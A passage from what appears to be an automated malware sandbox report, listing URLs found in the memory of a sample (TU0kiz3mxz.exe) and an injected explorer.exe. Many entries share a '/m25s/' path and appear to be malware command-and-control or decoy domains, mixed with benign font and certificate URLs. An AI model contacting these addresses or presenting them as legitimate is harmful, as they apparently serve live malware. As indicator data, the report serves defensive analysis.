0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700041635.0000000009744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 0000000F.00000003.2804871822.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2793569452.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2803535745.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2818334833.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2794596825.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2768130386.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2772643327.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4179161304.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2798970117.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3932879734.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3941148394.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2966304641.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2761273592.000000000CDC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 0000000F.00000003.2804871822.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2793569452.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2803535745.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2818334833.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2794596825.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2768130386.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2772643327.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4179161304.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2798970117.000000000CDCD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3932879734.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3941148394.000000000CD64000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2966304641.000000000CDC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2761273592.000000000CDC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000004.00000002.2632617242.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2634903958.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2632406238.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsdQdelete
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6874.club
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6874.club/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6874.club/m25s/www.cleans.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6874.clubReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digital
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digital/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digital/m25s/www.ax-th-6011838.fyi
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.6uzh.digitalReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autos/m25s/www.uykoii.shop
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.76iw543gw.autosReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfd/m25s/www.ildcraft.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anforexuytin.cfdReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.net/m25s/www.ehills.shop
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.araghospitality.netReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyz/m25s/www.76iw543gw.autos
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.armanshop.xyzReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.online/m25s/www.raphic-design-degree-33148.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.attoomasteracademy.onlineReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyi/m25s/www.wistlnc.net
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ax-th-6011838.fyiReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpa/m25s/www.itodemo.click
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cctofi.cpaReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyz/m25s/www.ental-health-69511.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cleans.xyzReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/o
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shop/m25s/www.olnacasinotcs14.top
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cskuvq.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shop/m25s/www.cctofi.cpa
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dt5r.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/www.anforexuytin.cfd
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shop/m25s/www.cskuvq.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ehills.shopReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bond/m25s/www.uykoii.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-health-69511.bondReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vip/m25s/www.cskuvq.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ierra777.vipReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyz/m25s/www.dt5r.shop
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ildcraft.xyzReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.click/m25s/www.xewaov.xyz
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.itodemo.clickReferer:
          Source: TU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/www.yeloma-treatment-82106.bond
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bondReferer:
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top/m25s/
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.top/m25s/www.attoomasteracademy.online
          Source: explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olnacasinotcs14.topReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/www.6874.club
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zoneReferer:
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net
          Source: explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pringhillinfos.net/m25s/
